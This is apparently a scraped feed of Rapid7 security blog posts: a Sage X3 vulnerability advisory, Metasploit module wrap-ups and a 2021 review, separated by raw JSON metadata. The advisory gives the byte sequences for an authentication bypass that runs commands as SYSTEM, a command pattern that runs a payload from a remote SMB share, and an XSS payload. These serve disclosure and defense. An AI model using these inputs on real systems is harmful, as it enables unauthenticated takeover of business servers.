CVE-2020-7390 was previously reported to the vendor by [Vivek Srivastav](<https://app.cobalt.io/vsrivastav>) from Cobalt Labs in January of 2021.

# Exploitation

For each of the identified vulnerabilities, what follows is a brief description of the issue and exploitation techniques that leverage it:

## CVE-2020-7388: Sage X3 Unauthenticated Remote Command Execution (RCE) as SYSTEM in AdxDSrv.exe component

Sage X3 exposes an administrative service on port TCP/1818 (default, but changeable) under the process "AdxDSrv.exe," part of the AdxAdmin component. This service is used for remote administration of the Sage ERP solution through the Sage X3 Console.
A vulnerability within the service allows a malicious actor to craft a request to the exposed service to execute commands on the server as the "NT AUTHORITY\SYSTEM" user.

### AdxDSrv.exe Authentication and Execution Process

Sage X3 uses a custom protocol for interaction between the Sage X3 Console thick client and AdxDSrv.exe. Reviewing the protocol, the Sage X3 console crafts a request to authenticate using a byte sequence as follows:

    0x6a + length of message + length of username + username + length of username + username + \x1cCRYPT: + encryptedpassword

Sage X3 uses a custom encryption mechanism to encrypt the password, but for the sake of brevity, we will not go into the encryption method here. An example message can be seen below, sending the user "admin" with password "password":

`\x6a'\x05admin\x05admin\x1aCRYPT:tzksgrQeseSccrftgrqk`

In response, AdxDSrv.exe sends 4 bytes indicating that authentication was successful. These bytes are always prefixed with \x00\x00 and then two apparently random bytes, like so:

`\x00\x00\x08\x14`

After receiving this successful authentication response, a message can be sent to execute remote commands. First, the temporary directory is specified by the client, along with the name of the "cmd" file to be written to the server.

As seen in the image below, the batch file, with the provided "cmd" file name, is written to disk with the "whoami" command in it:

After the AdxDSrv.exe service writes the temporary batch file to the named folder, it will execute it under the security context of the provided user credentials, via a Windows API call to CreateProcessAsUserA. This can be observed within Windows Event Logs as a Windows Event Logon with `CreateProcess(AsUser)`.
Below is an example of the sequence of messages that ultimately results in the command being written to a file, executed, and its output read back:

Below is the snippet of code that calls CreateProcessAsUserA with the provided user credentials within AdxSrv.exe, a thread spawned from AdxDSrv.exe:

### Executing Without Valid Authentication, as NT AUTHORITY\SYSTEM

Sending commands to execute requires two components. The first is knowing the installation directory of the AdxAdmin service, so that the client can provide the service the full path to which the ".cmd" file to be executed will be written. The second component is the "authorization sequence," which, as shown above, involves sending a username and password encrypted with the encryption scheme used by the AdxDSrv.exe service, so that the .cmd file is executed via a Windows API call to CreateProcessAsUserA.

Obtaining the installation directory can be done either with prior knowledge, educated guesswork, or via an unauthenticated, remote information disclosure vulnerability outlined below as CVE-2020-7387.

The second step can be sidestepped with a series of packets that recreate the AdxDSrv.exe authentication and command protocol, but with one critical modification: an attacker can simply swap one byte and cause the service to ignore the provided user credentials, and instead execute under the current AdxDSrv.exe process security context, which runs as NT AUTHORITY\SYSTEM. A bit of fuzzing revealed that using "0x06" instead of "0x6a" at the start of the authorization sequence allows the sequence to continue and the command to instead run as the NT AUTHORITY\SYSTEM account.

In other words, the client appears to be able to opt out of authentication entirely.
In this mode, the requested command is executed as SYSTEM instead of impersonating a provided user account.

The image below shows a proof-of-concept exploit in action, sending the entire sequence to execute "whoami" without ever having provided the encrypted user credentials that were previously required.

The issue was fixed in AdxAdmin version 93.2.53, which is common to X3 V9, V11, and V12, and ships with Syracuse 9.22.7.2, 11.25.2.6, and 12.10.2.8, respectively.

## CVE-2020-7387: Sage X3 Installation Pathname Disclosure

While fuzzing the authentication and command protocol used by AdxAdmin.exe as described in CVE-2020-7388, it was discovered that sending the first byte as "0x09" rather than "0x6a", with three trailing null bytes, returned the installation directory without requiring any authentication.

The image below shows an example of the message being sent, along with the response from the server containing the directory path information:

While installation path names tend to be fairly predictable when it comes to most enterprise software (nearly all users install to a default directory on one of a handful of drive letters), this vulnerability does give an attacker the information required to exploit CVE-2020-7388, above.

## CVE-2020-7389: System CHAINE Variable Script Command Injection

Some web application scripts that allowed the use of the 'System' function could be paired with the 'CHAINE' variable in order to execute arbitrary commands, including those sourced from a remote SMB share. The page can be reached via the menu prompts _Development -> Script dictionary -> Scripts_.
Note that, according to the vendor, this functionality should only be available in development environments, and not production environments.

In the below example, the vulnerable command pattern `System CHAINE="\\<SMB Server>\<Share>\<Payload>"` is demonstrated:

The screenshot below demonstrates an Impacket SMB server that offers "a.bat", which in turn calls "b.exe," and the resultant attempt to connect to the share and evaluate the payload specified in the CHAINE variable:

## CVE-2020-7390: Stored XSS Vulnerability on ‘Edit’ Page of User Profile

The ‘First name’, ‘Last name’, and ‘Email’ fields within the ‘Edit User’ page are vulnerable to stored XSS. An example XSS string, `test<img src=x onerror=(alert('xss'))>></x>"></plaintext\></|\>`, is executed upon a `mouseOver` JavaScript event, as demonstrated below:

# Impact

When combining CVE-2020-7387 and CVE-2020-7388, an attacker can first learn the installation path of the affected software, then use that information to pass commands to the host system to be run in the SYSTEM context. This can allow an attacker to run arbitrary operating system commands to create Administrator-level users, install malicious software, and otherwise take complete control of the system for any purpose.

CVE-2020-7389 describes a mechanism to subvert the development environment for Sage X3, and ultimately run OS commands as the "x3run" user. However, this functionality is a) restricted to authenticated users of Sage X3, and b) should not be exposed in production environments.

Finally, CVE-2020-7390 describes a persistent cross-site scripting vulnerability, which can only be triggered by an authenticated user, and requires user interaction in order to complete the attack.
If successful, however, this vulnerability could allow a regular user of Sage X3 to execute privileged functions as a currently logged-in administrator, or to capture administrator session cookies for later impersonation of a currently logged-in administrator. Note that unlike the other issues, this issue is present only in unpatched Version 12 instances of Sage X3 (and not Version 9 or Version 10).

# Vendor Statement

_Sage takes the security of its customer solutions extremely seriously, and regularly undertakes proactive testing across its products to identify potential vulnerabilities and provide fixes. We are grateful to Rapid7, who recently made Sage aware of a vulnerability in our on-premise Sage X3 product. Sage and its Partners have issued a fix for the vulnerability, contacted all applicable customers and advised them on the onward process – more information can be [found here](<https://www.sagecity.com/support_communities/sage_erp_x3/f/sage-x3-announcements-news-and-alerts/169216/sage-x3-product-fix-for-security-vulnerability-has-been-posted-to-kb-110640>) – with information on Sage X3 security best practices [here](<https://www.sagecity.com/support_communities/sage_erp_x3/f/sage-x3-announcements-news-and-alerts/169216/sage-x3-product-fix-for-security-vulnerability-has-been-posted-to-kb-110640>)._

# Remediation

The most recent on-premises versions of Sage X3 Version 9, Version 11, and Version 12 address these issues, and users of Sage X3 are urged to update their Sage infrastructure at their earliest convenience. In the event updates cannot be applied immediately, customers should consider the following remediation efforts:

 * For CVE-2020-7388 and CVE-2020-7387, do not expose the AdxDSrv.exe TCP port on any host running Sage X3 to the internet or other untrusted networks.
As a further preventative measure, the adxadmin service should be stopped entirely while in production.
 * For CVE-2020-7389, generally speaking, users should not expose this webapp interface to the internet or other untrusted networks. Furthermore, users of Sage X3 should ensure that development functionality is not available in production environments. For more information on ensuring this, please refer to [the vendor's Best Practices documentation](<https://online-help.sageerpx3.com/erp/12/public/getting-started_security-best-practices.html#Development>).
 * In the event that network segmentation is inconvenient due to business-critical functions, only users trusted with system administration of the machines that host Sage X3 should be granted login access to the web application.

# Disclosure Timeline

 * Dec 2020: Issues discovered by the above-named Rapid7 researchers.
 * Feb 3, 2021: Initial disclosure to the vendor, Sage
 * Feb 4, 2021: Details provided to the vendor.
 * Feb 22, 2021: Complete writeups of the findings provided to the vendor
 * Mar 25, 2021: Sage [released updates](<https://www.sagecity.com/gb/sage-x3-uk/f/sage-x3-uk-announcements-news-and-alerts/148233/sage-x3-version-11-march-2021>) for affected components
 * May 18, 2021: Sage begins targeted, private customer disclosure
 * Jun 14, 2021: Finalized vulnerability descriptions in cooperation with the vendor
 * Jul 7, 2021: Public Disclosure of CVE-2020-7387..7390.

(Rapid7 blog, "CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities", published 2021-07-07, https://blog.rapid7.com/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/; CVEs: CVE-2020-7387, CVE-2020-7388, CVE-2020-7389, CVE-2020-7390)

## Now I Control Your Resource Planning Servers

Sage X3 is a resource planning product from Sage Group, designed to help established businesses plan out their business operations. But what if you wanted to do more than just manage resources? What if you wanted to hijack the resource server itself? Well, wait no more: thanks to the work of [Aaron Herndon](<https://www.linkedin.com/in/aaron-herndon-54079b5a/>), [Jonathan Peterson](<https://www.linkedin.com/in/jonathan-p-004b76a1/>), [William Vu](<https://twitter.com/wvuuuuuuuuuuuuu>), [Cale Black](<https://github.com/cblack-r7>), and [Ryan Villarreal](<https://www.linkedin.com/in/ryanvillarreal/>), along with work from community contributor [deadjakk](<https://github.com/deadjakk>), Metasploit now has an exploit module for [CVE-2020-7388](<https://attackerkb.com/topics/q0ETmshZPW/cve-2020-7388?referrer=blog>) and [CVE-2020-7387](<https://attackerkb.com/topics/l1RZYyWf4X/cve-2020-7387?referrer=blog>), which allows unauthenticated attackers to gain `SYSTEM` level code execution on affected versions of Sage X3. This module should prove very useful on engagements, both as a way to gain an initial foothold in a target network and as a way to elevate privileges to allow for more effective pivoting throughout the target network.
More information on these vulnerabilities can be found in our detailed writeup post [on our blog](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/?referrer=blog>).

## Help My Server is Raining Keys

Another great module that landed this week was an exploit for [CVE-2021-27850](<https://attackerkb.com/topics/32H1tJnyGT/cve-2021-27850?referrer=blog>) from [Johannes Moritz](<https://www.radicallyopensecurity.com/our-team/pentester/JohannesMoritz.html>) and Yann Castel aka [Hakyac](<https://github.com/Hakyac>), which allows attackers to steal the HMAC key from applications that use a vulnerable version of the Apache Tapestry web framework. This HMAC key is particularly important in many applications, as it is often used to sign important data within the application. However, in the case of Apache Tapestry, one can actually take this even further and use the leaked HMAC key to exploit a separate Java deserialization vulnerability in Apache Tapestry to gain RCE using readily available gadgets such as CommonsBeanutils1 from ysoserial. Therefore this should be one to keep an eye out for and patch if you haven't already.

## PrintNightmare Improvements

Improvements have been made to the PrintNightmare module thanks to [Spencer McIntyre](<https://twitter.com/zerosteiner>) to improve the way that Metasploit checks if a target is vulnerable or not, as well as to incorporate the `\??\UNC\` bypass for the second and most recent patch at the time of writing. Additionally, a separate bug was fixed in Metasploit's DCERPC library to prevent crashes when handling fragmented responses from the target server that could not fit into a single packet.
These fixes should help ensure that not only is Metasploit able to better detect servers that are vulnerable to PrintNightmare, but also help target those servers that may not have fully applied all the appropriate patches and mitigations.

## New module content (4)

 * [Apache Tapestry HMAC secret key leak](<https://github.com/rapid7/metasploit-framework/pull/15211>) by Johannes Moritz and [Hakyac](<https://github.com/Hakyac>), which exploits [CVE-2021-27850](<https://attackerkb.com/topics/32H1tJnyGT/cve-2021-27850?referrer=blog>) - This adds an auxiliary module that retrieves the secret HMAC key from applications that use a vulnerable version of the Apache Tapestry web framework. Retrieving this key will allow an attacker to sign objects in order to exploit a separate Java deserialization vulnerability in Apache Tapestry.
 * [Sage X3 AdxAdmin Login Scanner](<https://github.com/rapid7/metasploit-framework/pull/15400>) by [Jonathan Peterson](<https://www.linkedin.com/in/jonathan-p-004b76a1/>) - Added a Sage X3 login scanner.
 * [Wordpress Plugin Backup Guard - Authenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/15402>) by Nguyen Van Khanh, [Ron Jost](<https://github.com/Hacker5preme>), and [Hakyac](<https://github.com/Hakyac>), which exploits [CVE-2021-24155](<https://attackerkb.com/topics/ufEsuA2DpJ/cve-2021-24155?referrer=blog>) - This adds a module that exploits an authenticated file upload vulnerability in the Wordpress plugin Backup Guard. For versions below `v1.6.0`, the plugin permits the upload of arbitrary PHP code due to insufficient checks on the file format.
Once the file is uploaded, code execution can be achieved by requesting the file, located under the `/wp-content/uploads/backup-guard` directory.
 * [Sage X3 Administration Service Authentication Bypass Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15400>) by [Aaron Herndon](<https://www.linkedin.com/in/aaron-herndon-54079b5a/>) and [Jonathan Peterson](<https://www.linkedin.com/in/jonathan-p-004b76a1/>), which exploits [CVE-2020-7388](<https://attackerkb.com/topics/q0ETmshZPW/cve-2020-7388?referrer=blog>) - Added an exploit for [CVE-2020-7387 + CVE-2020-7388](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/>).

## Enhancements and features

 * [#15403](<https://github.com/rapid7/metasploit-framework/pull/15403>) from [pingport80](<https://github.com/pingport80>) - This makes changes to the Powershell session type to report its platform using a value consistent with the other session types. It also adds Powershell session support to some methods within the file mixin.
 * [#15409](<https://github.com/rapid7/metasploit-framework/pull/15409>) from [zeroSteiner](<https://github.com/zeroSteiner>) - An update has been made to the PrintNightmare module to improve the way that it checks if a target is vulnerable or not, and to automatically convert UNC paths to the `\??\UNC\host\path\to\dll` format to bypass the second and most recent patch at the time of writing. Additionally, a bug was fixed in the DCERPC library where the data read would be incomplete when the response did not fit into a single fragment; this ensures that the PrintNightmare module can now read long responses from the target, such as when enumerating the installed printer drivers.
 * [#15440](<https://github.com/rapid7/metasploit-framework/pull/15440>) from [bwatters-r7](<https://github.com/bwatters-r7>) - This PR updates the payloads gem to include updates to Kiwi.
For more information, see rapid7/mimikatz#5 and rapid7/metasploit-payloads#490

## Bugs fixed

 * [#14683](<https://github.com/rapid7/metasploit-framework/pull/14683>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) - This replaces a cryptic exception raised by msfvenom when an incompatible EXE template file is used with a specific injection technique. The new exception validates whether the EXE is compatible and reports the reason it is not, so the user can more easily understand the problem.
 * [#15436](<https://github.com/rapid7/metasploit-framework/pull/15436>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) - Ensure that generated variable names aren't Java keywords
 * [#15443](<https://github.com/rapid7/metasploit-framework/pull/15443>) from [dwelch-r7](<https://github.com/dwelch-r7>) - Adds python3 support for the wmiexec external module `auxiliary/scanner/smb/impacket/wmiexec`
 * [#15445](<https://github.com/rapid7/metasploit-framework/pull/15445>) from [zeroSteiner](<https://github.com/zeroSteiner>) - Updates msfconsole's output logs to only show the target's IP when an exploit module is run, rather than a host hash

## Get it

As always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:

 * [Pull Requests 6.0.53...6.0.54](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-07-15T10%3A18%3A50%2B01%3A00..2021-07-22T11%3A58%3A03-05%3A00%22>)
 * [Full diff 6.0.53...6.0.54](<https://github.com/rapid7/metasploit-framework/compare/6.0.53...6.0.54>)

If you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).

(Rapid7 blog, "Metasploit Wrap-Up", published 2021-07-23, https://blog.rapid7.com/2021/07/23/metasploit-wrap-up-122/; CVEs: CVE-2020-7387, CVE-2020-7388, CVE-2021-24155, CVE-2021-27850)

## PrintNightmare

Rapid7 security researchers [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) and [Spencer McIntyre](<https://github.com/zeroSteiner>) have added a new module for
[CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), dubbed PrintNightmare. This module builds upon the research of Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0. The module triggers a remote DLL load by abusing a vulnerability in the Print Spooler service. The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request using the MS-RPRN vector, resulting in remote code execution as `NT AUTHORITY\SYSTEM`.

Because Metasploit's SMB server doesn't support SMB3 (yet), it's highly recommended to use an external SMB server like Samba that supports SMB3. The [Metasploit module documentation](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md>) details the process of generating a payload DLL and using this module to load it.

[CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>) is being actively exploited in the wild. For more information and a full timeline, see [Rapid7’s blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)!

## NSClient++

Great work by community contributor [Yann Castel](<https://github.com/Hakyac>) on their new NSClient++ module. This module allows an attacker with an unprivileged Windows account to gain admin access on a Windows system and start a shell.

For this module to work, both the web interface of NSClient++ and the `ExternalScripts` feature must be enabled.
You must also know where the NSClient config file is, as it is used to read the admin password, which is stored in clear text.

## New module content (2)

 * [Print Spooler Remote DLL Injection](<https://github.com/rapid7/metasploit-framework/pull/15385>) by Christophe De La Fuente, Piotr Madej, Spencer McIntyre, Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0, which exploits [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>) - A new module has been added to Metasploit to exploit PrintNightmare, aka CVE-2021-1675/CVE-2021-34527, a Remote Code Execution vulnerability in the Print Spooler service of Windows. Successful exploitation results in the ability to load and execute an attacker-controlled DLL as the `SYSTEM` user.
 * [NSClient++ 0.5.2.35 - Privilege escalation](<https://github.com/rapid7/metasploit-framework/pull/15318>) by BZYO, Yann Castel and kindredsec - This post module allows an attacker to perform a privilege escalation on a machine running a vulnerable version of NSClient++. The module retrieves the admin password from a config file at a customizable path and, so long as NSClient++ has both the web interface and the ExternalScripts feature enabled, gains a SYSTEM shell.

## Enhancements and features

 * [#15366](<https://github.com/rapid7/metasploit-framework/pull/15366>) from [pingport80](<https://github.com/pingport80>) - This updates how the msfconsole's history file is handled.
It adds a size limitation so the number of commands does not grow indefinitely, and fixes a locking condition that would occur when the history file had grown exceptionally large (~400,000 lines or more).

## Bugs fixed

 * [#15320](<https://github.com/rapid7/metasploit-framework/pull/15320>) from [agalway-r7](<https://github.com/agalway-r7>) - A bug has been fixed in the `read_file` method of `lib/msf/core/post/file.rb` that prevented PowerShell sessions from being able to use the `read_file()` method. PowerShell sessions should now be able to use this method to read files from the target system.
 * [#15371](<https://github.com/rapid7/metasploit-framework/pull/15371>) from [bcoles](<https://github.com/bcoles>) - This fixes an issue in the `apport_abrt_chroot_priv_esc` module where, if the `apport-cli` binary was not in the PATH, the check method would fail.

## Get it

As always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:

 * [Pull Requests 6.0.51...6.0.52](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-06-30T14%3A00%3A49-05%3A00..2021-07-08T16%3A19%3A37%2B01%3A00%22>)
 * [Full diff 6.0.51...6.0.52](<https://github.com/rapid7/metasploit-framework/compare/6.0.51...6.0.52>)

If you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.

To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).

(Rapid7 blog, "Metasploit Wrap-up", published 2021-07-09, https://blog.rapid7.com/2021/07/09/metasploit-wrap-up-120/; CVEs: CVE-2021-1675, CVE-2021-34527)

Now that 2022 is fully underway, it's time to wrap up some of the milestones that Rapid7 achieved in 2021. We worked harder than ever last year to help protectors keep their organization's infrastructure secure — even in the face of [some of the most difficult threats](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) the security community has dealt with in recent memory. Here's a rundown of some of our biggest moments in that effort from 2021.

## Emergent threats and vulnerability disclosures

As always, our Research and Emergent Threat Response teams spent countless hours this year tirelessly bringing you need-to-know information about the most impactful late-breaking security exploits and vulnerabilities.
Let's revisit some of the highlights.

### Emergent threat reports

 * [Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)
 * [CVE-2021-34527 (PrintNightmare): What You Need to Know](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)
 * [GitLab Unauthenticated Remote Code Execution CVE-2021-22205 Exploited in the Wild](<https://www.rapid7.com/blog/post/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/>)
 * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)
 * [Microsoft SAM File Readability CVE-2021-36934: What You Need to Know](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)
 * [ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>)

### Vulnerability disclosures

 * [CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)](<https://www.rapid7.com/blog/post/2021/09/07/cve-2021-3546-78-akkadian-console-server-vulnerabilities-fixed/>)
 * [Fortinet FortiWeb OS Command Injection](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>)
 * [CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/>)

## Research and policy highlights

That's not all our Research team was up to in 2021.
They also churned out a wealth of content and resources weighing in on issues of industry-wide, national, and international importance.\n\n * We published several reports on the state of cybersecurity, including:\n * Our [2020 Vulnerability Intelligence Report](<https://www.rapid7.com/blog/post/2021/03/11/introducing-the-vulnerability-intelligence-report-50-cves-that-made-headlines-in-2020/>)\n * Our latest [Industry Cyber-Exposure Report (ICER)](<https://www.rapid7.com/blog/post/2021/05/05/rapid7-releases-new-industry-cyber-exposure-report-icer-asx-200/>)\n * Our [2021 Cloud Misconfigurations Report](<https://www.rapid7.com/info/2021-cloud-misconfigurations-research-report/>)\n * We tackled the [hot-button topic of hack back](<https://www.rapid7.com/blog/post/2021/08/10/hack-back-is-still-wack/>) and discussed whether or not the practice is, in fact, wack. (Spoiler: It is.)\n * We unpacked the implications for [cybersecurity in the US Infrastructure Bill](<https://www.rapid7.com/blog/post/2021/08/31/cybersecurity-in-the-infrastructure-bill/>).\n * We highlighted the reasons why we think the [UK's Computer Misuse Act](<https://www.rapid7.com/blog/post/2021/08/12/reforming-the-uks-computer-misuse-act/>) needs some revising.\n * We launched [Project Doppler](<https://www.rapid7.com/research/project-doppler/>), a free tool for Rapid7 customers, developed by our Research team to help organizations get better insight into their public internet exposure.\n\n## The Rapid7 family keeps growing\n\nThroughout 2021, we made some strategic acquisitions to broaden the solutions we offer and help make the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>) the one-stop shop for your security program.\n\n * [We acquired IntSights](<https://www.rapid7.com/blog/post/2021/07/19/rapid7-acquires-intsights/>) to help organizations obtain holistic threat intelligence.\n * [We teamed up with open-source platform 
Velociraptor](<https://www.rapid7.com/blog/post/2021/04/21/rapid7-and-velociraptor-join-forces/>) to provide teams with better endpoint visibility.\n * [We brought Kubernetes security provider Alcide](<https://www.rapid7.com/blog/post/2021/02/01/rapid7-acquires-leading-kubernetes-security-provider-alcide/>) under the Rapid7 umbrella to add more robust cloud security capabilities to InsightCloudSec.\n\n## Industry accolades\n\nWe're always thrilled to get industry recognition for the work we do helping protectors secure their organizations \u2014 and we had a few big nods to celebrate in 2021.\n\n * Gartner once again [named us a Leader](<https://www.rapid7.com/blog/post/2021/08/23/rapid7-mdr-named-a-market-leader-again/>) in its Magic Quadrant for Managed Detection and Response (MDR).\n * We also earned recognition as a Strong Performer in the [inaugural Forrester Wave for MDR](<https://www.rapid7.com/blog/post/2021/03/24/rapid7-recognized-as-a-strong-performer-in-the-inaugural-forrester-wave-for-mdr-q1-2021/>).\n * InsightIDR was recognized by Gartner us as a [Leader in SIEM](<https://www.rapid7.com/blog/post/2021/07/06/once-again-rapid7-named-a-leader-in-2021-gartner-magic-quadrant-for-siem/>) for the second time in a row.\n * For its 2021 Dynamic Application Security Testing (DAST) Magic Quadrant, Gartner [named us a Visionary](<https://www.rapid7.com/blog/post/2021/06/01/rapid7-named-a-visionary-in-2021-gartner-magic-quadrant-for-application-security-testing/>).\n\n## Keeping in touch\n\nClearly, we had a pretty busy 2021 \u2014 and we have even more planned for 2022. If you need the latest and greatest in security content to tide you over throughout the last few weeks of the year, we have a few ideas for you.\n\n * Listen to the [latest season of Security Nation](<https://www.rapid7.com/blog/series/security-nation/security-nation-season-4/>), our podcast where we chat with amazing guests from all corners of the security community. 
Season 5 launches later this month!\n * Put the finishing touches on your cybersecurity program for the coming year with insights from our [2022 Planning series](<https://www.rapid7.com/blog/tag/2022-planning/>).\n * Get better acquainted with the latest application security threats with our series on the [OWASP Top 10 for 2021](<https://www.rapid7.com/blog/tag/owasp-top-10-2021/>).\n * Read up on why [InsightIDR was XDR before it was cool to be XDR](<https://www.rapid7.com/blog/post/2021/11/09/insightidr-was-xdr-before-xdr-was-even-a-thing-an-origin-story/>).\n\nStay tuned for more great content, research, and much more in 2022!\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-01-05T18:52:41", "type": "rapid7blog", "title": "Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7387", "CVE-2021-1675", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-34527", "CVE-2021-3546", "CVE-2021-36934", "CVE-2021-44228"], 
"modified": "2022-01-05T18:52:41", "id": "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "href": "https://blog.rapid7.com/2022/01/05/rapid7-2021-wrap-up-highlights-from-a-year-of-empowering-the-protectors/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T21:28:40", "description": "\n\nCyberattacks are a distinct concern in the [Russia-Ukraine conflict](<https://www.rapid7.com/blog/tag/russia-ukraine-conflict/>), with the potential to impact individuals and organizations far beyond the physical frontlines. With events unfolding rapidly, we want to provide a single channel by which we can communicate to the security community the major cyber-related developments from the conflict each day.\n\nEach business day, we will update this blog at 5 pm EST with what we believe are the need-to-know updates in cybersecurity and threat intelligence relating to the Russia-Ukraine conflict. We hope this blog will make it easier for you to stay current with these events during an uncertain and quickly changing time.\n\n* * *\n\n## March 16, 2022\n\nUkrainian President Volodymyr Zelenskyy [delivered a virtual speech](<https://www.nbcnews.com/politics/congress/zelenskyy-expected-press-us-military-support-address-congress-rcna20088>) to US lawmakers on Wednesday, asking again specifically for a no-fly zone over Ukraine and for additional support. \n\nThe White House released a new [fact sheet](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/16/fact-sheet-on-u-s-security-assistance-for-ukraine/>) detailing an additional $800 million in security assistance to Ukraine. \n\n**Threat Intelligence Update**\n\n * ******UAC-0056 targets Ukrainian entities******\n\nSentinelOne researchers reported that UAC-0056 targeted Ukrainian entities using a malicious Python-based package, masquerading as a Ukrainian language translation software. 
Once installed, the fake app deployed various malware, such as Cobalt Strike, GrimPlant, and GraphSteel.\n\n_Source: [Sentinel One](<https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/>)_\n\n * ******A ****h****acker was caught routing calls to Russian troops******\n\nThe Security Service of Ukraine claimed to have arrested a hacker that helped deliver communications from within Russia to the Russian troops operating in the Ukrainian territory. The hacker also sent text messages to\n\nUkrainian security officers and civil servants, exhorting them to surrender.\n\n_Source: [The Verge](<https://www.theverge.com/2022/3/15/22979381/phone-relay-capture-russia-military-unencrypted-communications-ukraine>)_\n\n## March 15, 2022\n\nThe Ukrainian Ministry of Defense [leaked documents](<https://www.scmagazine.com/analysis/breach/in-a-first-ukraine-leaks-russian-intellectual-property-as-act-of-war>) of a Russian nuclear power plant. This may be the first-ever instance of a hack-and-leak operation to weaponize the disclosure of intellectual property to harm a nation.\n\nResearchers at INFOdocket, a subsidiary of [Library Journal](<https://en.wikipedia.org/wiki/Library_Journal>), have [created](<https://www.infodocket.com/2022/03/10/briefings-reports-and-updates-about-the-conflict-in-ukraine-from-the-congressional-research-service-european-parliament-research-service-and-uk-house-of-commons-library/>) a compendium of briefings, reports, and updates about the conflict in Ukraine from three research organizations: Congressional Research Service (CRS), European Parliament Research Service (EPRS), and the UK House of Commons Library. 
